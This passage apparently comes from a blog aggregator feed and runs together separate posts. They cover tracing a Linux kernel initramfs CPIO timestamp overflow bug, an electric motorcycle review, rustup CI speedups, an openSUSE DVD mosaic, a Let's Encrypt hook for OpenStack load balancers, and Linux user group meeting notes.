.ns.count = REFCOUNT_INIT(2),
.name = {
.sysname = UTS_SYSNAME,
.nodename = UTS_NODENAME,
.release = UTS_RELEASE,
.version = UTS_VERSION,
.machine = UTS_MACHINE,
.domainname = UTS_DOMAINNAME,
},
.user_ns = &init_user_ns,
.ns.inum = PROC_UTS_INIT_INO,
#ifdef CONFIG_UTS_NS
.ns.ops = &utsns_operations,
#endif
};
This is where the trail goes cold: I don't know if you've ever tried this, but searching for .version in the kernel's codebase is not a very fruitful endeavor when you're interested in a specific kind of version.
$ rg "(\.|\->)version\b" | wc -l
5718
I tried tracing the usage of init_uts_ns, but didn't get very far.
By now I'd already posted this in chat and another developer, Joel Stanley, was also investigating this bizarre bug. They had been testing different timestamp values and made the horrifying discovery that the bug sticks around after a rebuild. So you could start with a broken build, set the timestamp back to the correct value, rebuild, and the resulting kernel would still be broken. The boot log would report the correct time, but the root disk mounter panicked all the same.
I wasn't prepared to investigate the boot panic directly until the persistence bug was fixed. Having to run make clean and rebuild everything would take an annoyingly long time, even with ccache. Fortunately, I had a plan. All I had to do was work out which generated files are different between a broken and working build, and binary search by deleting half of them until deleting only one made the difference between the bug persisting or not. We can use diff for this. Running the initial diff we get
$ diff -q --exclude System.map --exclude .tmp_vmlinux* --exclude tools broken/ working/
Common subdirectories: broken/arch and working/arch
Common subdirectories: broken/block and working/block
Files broken/built-in.a and working/built-in.a differ
Common subdirectories: broken/certs and working/certs
Common subdirectories: broken/crypto and working/crypto
Common subdirectories: broken/drivers and working/drivers
Common subdirectories: broken/fs and working/fs
Common subdirectories: broken/include and working/include
Common subdirectories: broken/init and working/init
Common subdirectories: broken/io_uring and working/io_uring
Common subdirectories: broken/ipc and working/ipc
Common subdirectories: broken/kernel and working/kernel
Common subdirectories: broken/lib and working/lib
Common subdirectories: broken/mm and working/mm
Common subdirectories: broken/net and working/net
Common subdirectories: broken/scripts and working/scripts
Common subdirectories: broken/security and working/security
Common subdirectories: broken/sound and working/sound
Common subdirectories: broken/usr and working/usr
Files broken/.version and working/.version differ
Common subdirectories: broken/virt and working/virt
Files broken/vmlinux and working/vmlinux differ
Files broken/vmlinux.a and working/vmlinux.a differ
Files broken/vmlinux.o and working/vmlinux.o differ
Files broken/vmlinux.strip.gz and working/vmlinux.strip.gz differ
Hmm, OK so only some top level files are different. Deleting all the different files doesn't fix the persistence bug though, and I know that a proper make clean does fix it, so what could possibly be the difference when all the remaining files are identical?
Oh wait. man diff reports that diff only compares the top level folder entries by default. So it was literally just telling me "yes, both the broken and working builds have a folder named X". How GNU of it. Re-running the diff command with actually useful options, we get a more promising story
$ diff -qr --exclude System.map --exclude .tmp_vmlinux* --exclude tools build/broken/ build/working/
Files build/broken/arch/powerpc/boot/zImage and build/working/arch/powerpc/boot/zImage differ
Files build/broken/arch/powerpc/boot/zImage.epapr and build/working/arch/powerpc/boot/zImage.epapr differ
Files build/broken/arch/powerpc/boot/zImage.pseries and build/working/arch/powerpc/boot/zImage.pseries differ
Files build/broken/built-in.a and build/working/built-in.a differ
Files build/broken/include/generated/utsversion.h and build/working/include/generated/utsversion.h differ
Files build/broken/init/built-in.a and build/working/init/built-in.a differ
Files build/broken/init/utsversion-tmp.h and build/working/init/utsversion-tmp.h differ
Files build/broken/init/version.o and build/working/init/version.o differ
Files build/broken/init/version-timestamp.o and build/working/init/version-timestamp.o differ
Files build/broken/usr/built-in.a and build/working/usr/built-in.a differ
Files build/broken/usr/initramfs_data.cpio and build/working/usr/initramfs_data.cpio differ
Files build/broken/usr/initramfs_data.o and build/working/usr/initramfs_data.o differ
Files build/broken/usr/initramfs_inc_data and build/working/usr/initramfs_inc_data differ
Files build/broken/.version and build/working/.version differ
Files build/broken/vmlinux and build/working/vmlinux differ
Files build/broken/vmlinux.a and build/working/vmlinux.a differ
Files build/broken/vmlinux.o and build/working/vmlinux.o differ
Files build/broken/vmlinux.strip.gz and build/working/vmlinux.strip.gz differ
There are some new entries here: notably init/version* and usr/initramfs*. Binary searching these files results in a single culprit: usr/initramfs_data.cpio. This is quite fitting, as the .cpio file is an archive defining a filesystem layout, much like .tar files. This file is actually embedded into the kernel image, and loaded as a bare-bones shim filesystem when the user doesn't provide their own initramfs1.
So it would make sense that if the CPIO archive wasn't being rebuilt, then the initial filesystem wouldn't change. And it would make sense for the initial filesystem to be causing mount issues of the proper root disk filesystem.
This just leaves the question of how KBUILD_BUILD_TIMESTAMP is breaking the CPIO archive. And it's around this time that a third developer, Andrew, who I'd roped into this bug hunt for having the (mis)fortune to sit next to me, pointed out that the generator script for this CPIO archive was passing the KBUILD_BUILD_TIMESTAMP to date. Whoop, we've found the murder weapon2!
The persistence bug could be explained now: because the script was only using KBUILD_BUILD_TIMESTAMP internally, make had no way of knowing that the archive generation depended on this variable. So even when I changed the variable to a valid value, make didn't know to rebuild the corrupt archive. Let's now get back to the main issue: why boot panics.
Following along the CPIO generation script, the KBUILD_BUILD_TIMESTAMP variable is turned into a timestamp by date -d"$KBUILD_BUILD_TIMESTAMP" +%s. Testing this in the shell with 0000-01-01 we get this (somewhat amusing, but also painful) result
date -d"$KBUILD_BUILD_TIMESTAMP" +%s
-62167255492
This timestamp is then passed to a C program that assigns it to a variable default_mtime. Looking over the source, it seems this variable is used to set the mtime field on the files in the CPIO archive. The timestamp is stored as a time_t, which is an alias for int64_t. That's 64 bits of data, up to 16 hexadecimal characters. And yes, that's relevant: CPIO stores the mtime (and all other numerical fields) as 32 bit unsigned integers represented by ASCII hexadecimal characters. The sprintf() call that ultimately embeds the timestamp uses the %08lX format specifier. This formats a long as hexadecimal, padded to at least 8 characters. Hang on... at least 8 characters? What if our timestamp happens to be more?
It turns out that large timestamps are already guarded against. The program will error during build if the date is later than 2106-02-07 (maximum unsigned 8 hex digit timestamp).
/*
* Timestamps after 2106-02-07 06:28:15 UTC have an ascii hex time_t
* representation that exceeds 8 chars and breaks the cpio header
* specification.
*/
if (default_mtime > 0xffffffff) {
fprintf(stderr, "ERROR: Timestamp too large for cpio format\n");
exit(1);
}
But we are using an int64_t. What would happen if one were to provide a negative timestamp?
Well, sprintf() happily spits out FFFFFFF1868AF63C when we pass in our negative timestamp representing 0000-01-01. That's 16 characters, 8 too many for the CPIO header3.
So at last we've found the cause of the panic: the timestamp is being formatted too long, which breaks the CPIO header and the kernel doesn't create an initial filesystem correctly. This includes the /dev folder (which surprisingly is not hardcoded into kernel, but must be declared by the initramfs). So when the root disk mounter tries to open /dev/vda2, it correctly complains that it failed to create a device in the non-existent /dev.
After discovering all this, I sent in a couple of patches to fix the CPIO generation and rebuild logic. They were not complicated fixes, but wow were they time consuming to track down. I didn't see the error initially because I typically only boot with my own initramfs over the embedded one, and not with the intent to load a root disk. Then the panic itself was quite far away from the real issue, and there were many dead ends to explore.
I also got curious as to why the kernel didn't complain about a corrupt initramfs earlier. A brief investigation showed a streaming parser that is extremely fault tolerant, silently skipping invalid entries (like ones missing or having too long a name). The corrupted header was being interpreted as an entry with an empty name and 2 gigabyte body contents, which meant that (1) the kernel skipped inserting it due to the empty name, and (2) the kernel skipped the rest of the initramfs because it thought that up to 2 GB of the remaining content was part of that first entry.
Perhaps this could be improved to require that all input is consumed without unexpected EOF, such as how the userspace cpio tool works (which, by the way, recognises the corrupt archive as such and refuses to decompress it). The parsing logic is mostly from the before-times though (i.e., pre initial git commit), so it's difficult to distinguish intentional leniency and bugs.
Incidentally, in investigating this I came across another bug. There is a helper function panic_show_mem() in the initramfs that's meant to dump memory information and then call panic(). It takes in standard printf() style format string and arguments, and tries to forward them to panic() which ultimately prints them.
static void panic_show_mem(const char *fmt, ...)
{
va_list args;
show_mem(0, NULL);
va_start(args, fmt);
panic(fmt, args);
va_end(args);
}
void panic(const char *fmt, ...);
But variadic arguments don't quite work this way: instead of forwarding the list args as intended, panic() will instead interpret args as a single argument for the format string fmt. Standard library functions address this by providing v* variants of printf() and friends. For example,
int printf(char *fmt, ...);
int vprintf(char *fmt, va_list args);
We might create a vpanic() function in the kernel that follows this style, but it seems easier to just make panic_show_mem() a macro and 'forward' the arguments in the source code
#define panic_show_mem(fmt, ...) \
({ show_mem(0, NULL); panic(fmt, ##__VA_ARGS__); })
And that's where I've left things. Big thanks to Joel and Andrew for helping me with this bug. It was certainly a trip.
initramfs, or initrd for the older format, are specific kinds of CPIO archives. The initramfs is intended to be loaded as the initial filesystem of a booted kernel, typically in preparation for loading your normal root filesystem. It might contain modules necessary to mount the disk for example. ↩
Hindsight again would suggest it was obvious to look here because it shows up when searching for KBUILD_BUILD_TIMESTAMP. I unfortunately wasn't familiar with the usr/ source folder initially, and focused on the core kernel components too much earlier. Oh well, we found it eventually. ↩
I almost missed this initially. Thanks to the ASCII header format, strings was able to print the headers without any CPIO specific tooling. I did a double take when I noticed the headers for the broken CPIO were a little longer than the headers in the working one. ↩
The decision to do this rather than build my own was complicated, and I'm going to mostly skip over the detail of that. At some time I might put it in another blog post. But for now it's enough to say that I'd accidentally cooked the motor in my Mark I, the work on the Mark II was going to take ages, and I was in the relatively fortunate situation of being able to afford the Experia if I sold my existing Triumph Tiger Sport and the parts for the Mark II.
For other complicated reasons I was planning to be in Sydney after the weekend that Bruce at Zen Motorcycles told me the bike would be arriving. Rather than have it freighted down, and since I would have room for my riding gear in our car, I decided to pick it up and ride it back on the Monday. In reconnoitering the route, we discovered that by pure coincidence Zen Motorcycles is on Euston Road in Alexandria, only 200 metres away from the entrance to WestConnex and the M8. So with one traffic light I could be out of Sydney.
I will admit to being more than a little excited that morning. Electric vehicles are still, in 2023, a rare enough commodity that waiting lists can be months long; I ordered this bike in October 2022 and it arrived in March 2023. So I'd had plenty of time to build my expectations. And likewise the thought of riding a brand new bike - literally one of the first of its kind in the country (it is the thirty-second Experia ever made!) - was a little daunting. I obtained PDF copies of the manual and familiarised myself with turning the cruise control on and off, as well as checking and setting the regen braking levels. Didn't want to stuff anything up on the way home.
There is that weird feeling in those situations of things being both very ordinary and completely unique. I met Bruce, we chatted, I saw the other Experia models in the store, met Ed - who had come down to chat with Bruce, and just happened to be the guy who rode a Harley Davidson Livewire from Perth to Sydney and then from Sydney to Cape Tribulation and back. He shared stories from his trip and tips on hypermiling. I signed paperwork, picked up the keys, put on my gear, prepared myself.
Even now I still get a bit choked up just thinking of that moment. Seeing that bike there, physically real, in front of me - after those months of anticipation - made the excitement real as well.
So finally, after making sure I wasn't floating, and making sure I had my ear plugs in and helmet on the right way round, I got on. Felt the bike's weight. Turned it on. Prepared myself. Took off. My partner followed behind, through the lights, onto the M8 toward Canberra. I gave her the thumbs up.
We planned to stop for lunch at Mittagong, while the NRMA still offers the free charger at the RSL there. One lady was charging her Nissan Leaf on the ChaDeMo side; shortly after I plugged in a guy arrived in his Volvo XC40 Recharge. He had the bigger battery and would take longer; I just needed a ten minute top up to get me to Marulan.
I got to Marulan and plugged in; a guy came thinking he needed to tell the petrol motorbike not to park in the electric vehicle bay, but then realised that the plug was going into my bike. Kate headed off, having charged up as well, and I waited another ten minutes or so to get a bit more charge. Then I rode back.
I stopped, only once more - at Mac's Reef Road. I turned off and did a U turn, then waited for the traffic to clear before trying the bike's acceleration. Believe me when I say this bike will absolutely do a 0-100km/hr in under four seconds! It is not a light bike, but when you pull on the power it gets up and goes.
Here is my basic review, given that experience and then having ridden it for about ten weeks around town.
The absolute best feature of the Energica Experia is that it is perfectly comfortable riding around town. Ease on the throttle and it gently takes off at the traffic lights and keeps pace with the traffic. Ease off, and it gently comes to rest with regenerative braking and a light touch on the rear brake after stopping to hold it still. If you want to take off faster, wind the throttle on more. It is not temperamental or twitchy, and you have no annoying gears and clutch to balance.
In fact, I feel much more confident lane filtering, because before I would have to have the clutch ready and be prepared to give the Tiger Sport lots of throttle lest I accidentally stall it in front of an irate line of traffic. With the Experia, I can simply wait peacefully - using no power - and then when the light goes green I simply twist on the throttle and I am away ahead of even the most aggressive car driver.
It is amazingly empowering.
I'm not going to bore you with the stats - you can probably look them up yourself if you care. The main thing to me is that it has DC fast charging, and watching 75KW go into a 22.5KWHr battery is just a little bit terrifying as well as incredibly cool. The stated range of 250km on a charge at highway speeds is absolutely correct, from my experience riding it down from Sydney. And that plus the fast charging means that I think it is going to be quite reasonable to tour on this bike, stopping off at fast or even mid-level chargers - even a boring 22KW charger can fill the battery up in an hour. The touring group I travel with stops often enough that if those stops can be top ups, I will not hold anyone up.
Some time in the near future I hope to have a nice fine day where I can take it out on the Cotter Loop. This is an 80km stretch of road that goes west of Canberra into the foothills of the Brindabella Ranges, out past the Deep Space Tracking Station and Tidbinbilla Nature Reserve. It's a great combination of curving country roads and hilly terrain, and reasonably well maintained as well. I did that on the Tiger Sport, with a GoPro, before I sold it - and if I can ever convince PiTiVi to actually compile the video from it I will put that hour's ride up on a platform somewhere.
I want to do that as much to show off Canberra's scenery as to show off the bike.
And if the CATL battery capacity improvement comes through to the rest of the industry, and we get bikes that can do 400km to 500km on a charge, then electric motorbike touring really will be no different to petrol motorbike touring. The Experia is definitely at the forefront of that change, but it is definitely possible on this bike.
Rustup (the community package manage for the Rust language) was starting to really suffer : CI times were up at ~ one hour.
We’ve made some strides in bringing this down.
The first thing, which achieved about a 30% reduction in test time was to stop recreating all the test context every time.
Rustup tests the download/installation/upgrade of distributions of Rust. To avoid downloading gigabytes in the test suite, the suite creates mocks of the published Rust artifacts. These mocks are GPG signed and compressed with multiple compression methods, both of which are quite heavyweight operations to perform – and not actually the interesting code under test to execute.
Previously, every test was entirely hermetic, and usually the server state was also unmodified.
There were two cases where the state was modified. One, a small number of tests testing error conditions such as GPG signature failures. And two, quite a number of tests that were testing temporal behaviour: for instance, install nightly at time A, then with a newer server state, perform a rustup update and check a new version is downloaded and installed.
We’re partway through this migration, but compare these two tests:
fn check_updates_some() {
check_update_setup(&|config| {
set_current_dist_date(config, "2015-01-01");
config.expect_ok(&["rustup", "update", "stable"]);
config.expect_ok(&["rustup", "update", "beta"]);
config.expect_ok(&["rustup", "update", "nightly"]);
set_current_dist_date(config, "2015-01-02");
config.expect_stdout_ok(
&["rustup", "check"],
for_host!(
r"stable-{0} - Update available : 1.0.0 (hash-stable-1.0.0) -> 1.1.0 (hash-stable-1.1.0)
beta-{0} - Update available : 1.1.0 (hash-beta-1.1.0) -> 1.2.0 (hash-beta-1.2.0)
nightly-{0} - Update available : 1.2.0 (hash-nightly-1) -> 1.3.0 (hash-nightly-2)
"
),
);
})
}
fn check_updates_some() {
test(&|config| {
config.with_scenario(Scenario::ArchivesV2_2015_01_01, &|config| {
config.expect_ok(&["rustup", "toolchain", "add", "stable", "beta", "nightly"]);
});
config.with_scenario(Scenario::SimpleV2, &|config| {
config.expect_stdout_ok(
&["rustup", "check"],
for_host!(
r"stable-{0} - Update available : 1.0.0 (hash-stable-1.0.0) -> 1.1.0 (hash-stable-1.1.0)
beta-{0} - Update available : 1.1.0 (hash-beta-1.1.0) -> 1.2.0 (hash-beta-1.2.0)
nightly-{0} - Update available : 1.2.0 (hash-nightly-1) -> 1.3.0 (hash-nightly-2)
"
),
);
})
})
}
The former version mutates the date with set_current_dist_date; the new version uses two scenarios, one for the earlier time, and one for the later time. This permits the server state to be constructed only once. On a per-test basis it can move as much as 50% of the time out of the test.
The next major gain was moving from having 14 separate integration test binaries to just one. This reduces the link cost of linking the test binaries, all of which link in the same library. It also permits us to see unused functions in our test support library, which helps with cleaning up cruft rather than having it accumulate.
Part of the test suite for each test is setting up an installed rustup environment. Why not start from scratch every time? Well, we obviously have tests that do that, but most tests are focused on steps beyond the new-user case. Setting up an installed rustup environment has a few steps, but particular ones are copying a binary of rustup into the test sandbox, and hard linking it under various names: cargo, rustc, rustup etc.
A debug build of rustup is ~20MB. Running 400 tests means about 8GB of IO; on some platforms most of that IO won’t hit disk, on others it will.
In review now is a PR that changes the initial copy to a hardlink: we hardlink the rustup-init built by cargo into each test, and then hardlink that to the various binaries. That saves 8GB of IO, which isn’t much from some perspectives, but it adds pressure on the page cache, and is wasted work. One wrinkle is a very low max-links limit on NTFS of 1023; to mitigate that we count the links made to rustup-init and generate a new inode for the original to avoid failures happening.
In GitHub actions this lowers our test time to 19m for Linux, 24m for Windows, which is a lot better but not great.
I plan on experimenting with separate actions for building release artifacts and doing CI tests – at the moment we have the same action do both, but they don’t share artifacts in the cache in any meaningful way, so we can probably gain parallelism there, as well as turning off release builds entirely for CI.
We should finish the cached test context work and use it everywhere.
Also we’re looking at having less integration tests and more narrow close to the code tests.
Back in 2012, I received a box of eight hundred openSUSE 12.1 promo DVDs, which I then set out to distribute to local Linux users’ groups, tech conferences, other SUSE crew in Australia, and so forth. I didn’t manage to shift all 800 DVDs at the time, and I recently rediscovered the remaining three hundred and eighty four while installing some new shelves. As openSUSE 12.1 went end of life in May 2013, it seemed likely the DVDs were now useless, but I couldn’t bring myself to toss them in landfill. Instead, given last week was Hack Week, I decided to use them for an art project. Here’s the end result:
Making that mosaic was extremely fiddly. It’s possibly the most annoying Hack Week project I’ve ever done, but I’m very happy with the outcome 
The backing is a piece of 900mm x 600mm x 6mm plywood, primed with some leftover kitchen and bathroom undercoat, then spray pained black. I’d forgotten how bad spray paint smells, but it makes for a nice finish. To get the Geeko shape, I took the official openSUSE logo, then turned it into an outline in Inkscape, saved that as a PNG, opened it in GIMP, and cut it into nine 300mm x 200mm pieces which I then printed on A4 paper, stuck together with tape, and cut out to make a stencil. Of course, the first time I did that, nothing quite lined up, so I had to reprint it but with “Ignore page margins” turned off and “Draw crop marks” turned on, then cut the pages down along the crop marks before sticking them together the second time. Then I placed the stencil on the backing, glued the eye down (that just had to be made from the centre of a DVD!) and started laying out cut up DVD shards.
I initially tried cutting the DVDs with tin snips, which is easy on the hands, but had a tendency to sometimes warp the DVD pieces and/or cause them to delaminate, so I reverted to a large pair of scissors which was more effort but ultimately less problematic.
After placing the pieces that made up the head, tail, feet and spine, and deciding I was happy with how they looked, I glued each piece down with superglue. Think: carefully pick up DVD shard without moving too many other shards, turn over, dab on a few tiny globs of superglue, lower into place, press for a few seconds, move to next piece. Do not get any superglue on your fingers, or you’ll risk sticking your fingers together and/or make a gluey mess on the shiny visible side of the DVD shards.
It was another three sessions of layout-then-glue-down to fill in the body. I think I stuck my fingers together about six, or eight, or maybe twenty times. Also, despite my best efforts to get superglue absolutely nowhere near the stencil at all, when I removed the stencil, it had stuck to the backing in several places. I managed to scrape/cut that off with a combination of fingernails, tweezers, and the very sharp knife in my SLE 12 commemorative Leatherman tool, then touched up the remaining white bits with a fine point black Sharpie.
Judging from the leftover DVD centre pieces, this mosaic used about 12 DVDs in all, which isn’t very many considering my initial stash. I had a few other ideas for the remainder, mostly involving hanging them up somehow, which I messed around with earlier on while waiting for the paint to dry on the plywood.
One (failed) idea was to use a cutting wheel on my Dremel tool to slice half way through a few DVDs, then slot them into each other to make a hanging thingy that would spin in the wind. I was unable to make a smooth/straight enough cut for this to work, and superglue doesn’t bridge gaps. You can maybe get an idea of what I was aiming at from this photo:
My wife had an idea for a better way to do this, which is to take a piece of dowel, cut slots in the sides, and glue DVD halves into the slots using Araldite (that’s an epoxy resin, in case you didn’t grow up with that brand name). I didn’t get around to trying this, but I reckon she’s onto something. Next time I’m at the hardware store, I’ll try to remember to pick up some suitably sized dowel.
I did make one somewhat simpler hanging thingy, which I call “Geeko’s Tail (Uncurled)”. It’s just DVDs superglued together on the flat, hanging from fishing line, but I think it’s kinda cool:
Also, I’ve discovered that Officeworks has an e-waste recycling program, so any DVDs I don’t use in future projects needn’t go to landfill.
Update 2023-02-20: For photos of the mosaic, plus wallpapers made from the photos, see https://github.com/tserong/hackweek22
I have long said “Long Malaysians, Short Malaysia” in conversation to many. Maybe it took me a while to tweet it, but this was the first example: Dec 29, 2021. I’ve tweeted it a lot more since.
Malaysia has a 10th Prime Minister, but in general, it is a very precarious partnership. Consider it, same shit, different day?
5/n: Otherwise, there will be no change.
So change via “purported democracy” is never going to happen with a country like Malaysia, rotten to the core. It is a crazy dream.
You succeed, despite of. Davka.
Reboot, or bust.
Good luck, Malaysia.
— Colin Charles (@bytebot) August 18, 2021
I just have to get off the Malaysian news diet. Malaysians elsewhere, are generally very successful. Malaysians suffering by their daily doldrums, well, they just need to wake up, see the light, and succeed.
In the end, as much as people paraphrase, ask not what the country can do for you, legitimately, this is your life, and you should be taking good care of yourself and your loved ones. You succeed, despite of. Politics and the state happens, regardless of.
Me, personally? Ideas are abound for how to get Malaysians who see the light, to succeed elsewhere. And if I read, and get angry at something (tweet rage?), I’m going to pop RM50 into an investment account, which should help me get off this poor habit. I’ll probably also just cut subscriptions to Malaysian news things… Less exposure, is actually better for you. I can’t believe that it has taken me this long to realise this.
Time to build.
I did poorly blogging last year. Oops. I think to myself when I read, This Thing Still On?, I really have to do better in 2023. Maybe the catalyst is the fact that Twitter is becoming a shit show. I doubt people will leave the platform in droves, per se, but I think we are coming back to the need for decentralised blogs again.
I have 477 days to becoming 40. I ditched the Hobonich Techo sometime in 2022, and just focused on the Field Notes, and this year, I’ve got a Monocle x Leuchtturm1917 + Field Notes combo (though it seems my subscription lapsed Winter 2022, I should really burn down the existing collection, and resubscribe).
2022 was pretty amazing. Lots of work. Lots of fun. 256 days on the road (what a number), 339,551km travelled, 49 cities, 20 countries.
The getting back into doing, and not being afraid of experimenting in public is what 2023 is all about. The Year of The Rabbit is upon us tomorrow, hence why I don’t mind a little later Hello 2023 :)
Get back into the habit of doing. And publishing by learning and doing. No fear. Not that I wasn’t doing, but its time to be prolific with what’s been going on.
I better remember that.
I like using Catalyst Cloud to host some of my personal sites. In the past I used to use CAcert for my TLS certificates, but more recently I've been using Let's Encrypt for my TLS certificates as they're trusted in all browsers. Currently the LoadBalancer as a Service (LBaaS) in Catalyst Cloud doesn't have built in support for Let's Encrypt. I could use an apache2/nginx proxy and handle the TLS termination there and have that manage the Let's Encrypt lifecycle, but really, I'd rather use LBaaS.
So I thought I'd set about working out how to get Dehydrated (the Let's Encrypt client I've been using) to drive LBaaS (known as Octavia). I figured this would be of interest to other people using Octavia with OpenStack in general, not just Catalyst Cloud.
There's a few things you need to do. These instructions are specific to Debian:
As we're using HTTP-01 Challenge Type here, you need to have the LoadBalancer forwarding port 80 to your website to allow for the challenge response. It is good practice to have a redirect to HTTPS, here's an example virtual host for Apache:
<VirtualHost *:80>
ServerName www.example.com
ServerAlias example.com
RewriteEngine On
RewriteRule ^/.well-known/ - [L]
RewriteRule ^/(.*)$ https://www.example.com/$1 [R=301,L]
<Location />
Require all granted
</Location>
</VirtualHost>
You all also need this in /etc/apache2/conf-enabled/letsencrypt.conf:
Alias /.well-known/acme-challenge /var/lib/dehydrated/acme-challenges
<Directory /var/lib/dehydrated/acme-challenges>
Options None
AllowOverride None
# Apache 2.x
<IfModule !mod_authz_core.c>
Order allow,deny
Allow from all
</IfModule>
# Apache 2.4
<IfModule mod_authz_core.c>
Require all granted
</IfModule>
</Directory>
And that should be all that you need to do. Now, when Dehydrated updates your certificate, it should update your LoadBalancer as well!
Sample hook.sh:deploy_cert() {
local DOMAIN="${1}" KEYFILE="${2}" CERTFILE="${3}" FULLCHAINFILE="${4}" \
CHAINFILE="${5}" TIMESTAMP="${6}"
shift 6
# File contents should be:
# export OS_PASSWORD='your password in here'
. /etc/dehydrated/catalystcloud/password
# OpenRC file from the Catalyst Cloud dashboard
. /etc/dehydrated/catalystcloud/openrc.sh --no-token
# UUID of the LoadBalancer to be managed
LB_LISTENER='xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx'
# Barbican uses P12 files, we need to make one.
P12=$(readlink -f $KEYFILE \
| sed -E 's/privkey-([0-9]+)\.pem/barbican-\1.p12/')
openssl pkcs12 -export -inkey $KEYFILE -in $CERTFILE -certfile \
$FULLCHAINFILE -passout pass: -out $P12
# Keep track of existing certs for this domain (hopefully no more than 100)
EXISTING_URIS=$(openstack secret list --limit 100 \
-c Name -c 'Secret href' -f json \
| jq -r ".[]|select(.Name | startswith(\"$DOMAIN\"))|.\"Secret href\"")
# Upload the new cert
NOW=$(date +"%s")
openstack secret store --name $DOMAIN-$TIMESTAMP-$NOW -e base64 \
-t "application/octet-stream" --payload="$(base64 < $P12)"
NEW_URI=$(openstack secret list --name $DOMAIN-$TIMESTAMP-$NOW \
-c 'Secret href' -f value) \
|| unset NEW_URI
# Change LoadBalancer to use new cert - if the old one was the default,
# change the default. If the old one was in the SNI list, update the
# SNI list.
if [ -n "$EXISTING_URIS" ]; then
DEFAULT_CONTAINER=$(openstack loadbalancer listener show $LB_LISTENER \
-c default_tls_container_ref -f value)
for URI in $EXISTING_URIS; do
if [ "x$URI" = "x$DEFAULT_CONTAINER" ]; then
openstack loadbalancer listener set $LB_LISTENER \
--default-tls-container-ref $NEW_URI
fi
done
SNI_CONTAINERS=$(openstack loadbalancer listener show $LB_LISTENER \
-c sni_container_refs -f value | sed "s/'//g" | sed 's/^\[//' \
| sed 's/\]$//' | sed "s/,//g")
for URI in $EXISTING_URIS; do
if echo $SNI_CONTAINERS | grep -q $URI; then
SNI_CONTAINERS=$(echo $SNI_CONTAINERS | sed "s,$URI,$NEW_URI,")
openstack loadbalancer listener set $LB_LISTENER \
--sni-container-refs $SNI_CONTAINERS
fi
done
# Remove old certs
for URI in $EXISTING_URIS; do
openstack secret delete $URI
done
fi
}
HANDLER="$1"; shift
#if [[ "${HANDLER}" =~ ^(deploy_challenge|clean_challenge|sync_cert|deploy_cert|deploy_ocsp|unchanged_cert|invalid_challenge|request_failure|generate_csr|startup_hook|exit_hook)$ ]]; then
if [[ "${HANDLER}" =~ ^(deploy_cert)$ ]]; then
"$HANDLER" "$@"
fi
We’ve done this a number of times over the last decade, from OSDC to LCA. The idea is to provide a free psychologist or counsellor at an in-person conference. Attendees can do an anonymous booking by taking a stickynote (with the timeslot) from a signup sheet, and thus get a free appointment.
Many people find it difficult taking the first (very important) step towards getting professional help, and we’ve received good feedback that this approach indeed assists.
So far we’ve always focused on open source conferences. Now we’re moving into information security! First BrisSEC 2022 (Friday 29 April at the Hilton in Brisbane, QLD) and then AusCERT 2022 (10-13 May at the Star Hotel, Gold Coast QLD). The awesome and geek friendly Dr Carla Rogers will be at both events.
How does this get funded? Well, we’ve crowdfunded some, nudged sponsors, most mostly it gets picked up by the conference organisers (aka indirectly by the sponsors, mostly).
If you’re a conference organiser, or would like a particular upcoming conference to offer this service, do drop us a line and we’re happy to chase it up for you and help the organisers to make it happen. We know how to run that now.
In-person is best. But for virtual conferences, sure contact us as well.
The post Free psychologist service at conferences: April 2022 update first appeared on BlueHackers.org.The hack day didn’t go as well as I hoped, but didn’t go too badly. There was smaller attendance than hoped and the discussion was mostly about things other than FLOSS. But everyone who attended had fun and learned interesting things so generally I think it counts as a success. There was discussion on topics including military hardware, viruses (particularly Covid), rocketry, and literature. During the discussion one error in a Wikipedia page was discussed and hopefully we can get that fixed.
I think that everyone who attended will be interested in more such meetings. Overall I think this is a reasonable start to the Hack Day meetings, when I previously ran such meetings they often ended up being more social events than serious hacking events and that’s OK too.
One conclusion that we came to regarding meetings is that they should always be well announced in email and that the iCal file isn’t useful for everyone. Discussion continues on the best methods of announcing meetings but I anticipate that better email will get more attendance.
The March 2022 meeting went reasonably well. Everyone seemed to have fun and learn useful things about computers. After 2 hours my Internet connection dropped out which stopped the people who were using VMs from doing the tutorial. Fortunately most people seemed ready for a break so we ended the meeting. The early and abrupt ending of the meeting was a disappointment but it wasn’t too bad, the meeting would probably only have gone for another half hour otherwise.
The BigBlueButton system was shown to be effective for training when one person got confused with the Debian package configuration options for Postfix and they were able to share the window with everyone else to get advice. I was also confused by that stage.
The main feature of the meeting was training in setting up a mailserver with Postfix, here are the lecture notes for it [1]. The consensus at the end of the meeting was that people wanted more of that for the April meeting. So for the April meeting I will add to the Postfix Training to include SpamAssassin, SPF, DKIM, and DMARC. For the start of the next meeting instead of providing bare Debian installations for the VMs I’ll provide a basic Postfix/Dovecot setup so people can get straight into SpamAssassin etc.
For the May meeting training on SE Linux was requested.
Towards the end of the meeting we discussed Matrix and federated social media. LUV has a Matrix server and I can give accounts to anyone who’s involved in FOSS in the Australia and New Zealand area. For Mastodon the NZOSS Mastodon server [2] seems like a good option. I have an account there to try Mastodon, my Mastodon address is @etbe@mastodon.nzoss.nz .
We are going to make Matrix a primary communication method for the Flounder group, the room is #flounder:luv.asn.au . My Matrix address is @etbe:luv.asn.au .
We now have a mailing list see https://lists.linux.org.au/mailman/listinfo/flounder for information, the address to post to the list is flounder@lists.linux.org.au..
We also have a new URL for the blog and events. See the right sidebar for the link to the iCal file which can be connected to Google Calendar and most online calendaring systems.
We just had the first Flounder meeting which went well. Had some interesting discussion of storage technology, I learnt a few new things. Some people did the ZFS training and BTRFS training and we had lots of interesting discussion.
Andrew Pam gave a summary of new things in Linux and talked about the sites lwn.net, gamingonlinux.com, and cnx-software.com that he uses to find Linux news. One thing he talked about is the latest developments with SteamDeck which is driving Linux support in Steam games. The site protondb.com tracks Linux support in Steam games.
We had some discussion of BPF, for an introduction to that technology see the BPF lecture from LCA 2022.
The next meeting (Saturday 5th of March 1PM Melbourne time) will focus on running your own mail server which is always of interest to people who are interested in system administration and which is probably of more interest than usual because of Google forcing companies with “a legacy G Suite subscription” to transition to a more expensive “Business family” offering.
I “recently” wrote about obtaining a new (to me, actually quite old) computer over in The Apple Power Macintosh 7200/120 PC Compatible (Part 1). This post is a bit of a detour, but may help others understand why some images they download from the internet don’t work.
Disk partitioning is (of course) a way to divide up a single disk into multiple volumes (partitions) for different uses. While the idea is similar, computer platforms over the ages have done this in a variety of different ways, with varying formats on disk, and varying limitations. The ones that you’re most likely to be familiar with are the MBR partitioning scheme (from the IBM PC), and the GPT partitioning scheme (common for UEFI systems such as the modern PC and Mac). One you’re less likely to be familiar with is the Apple Partition Map scheme.
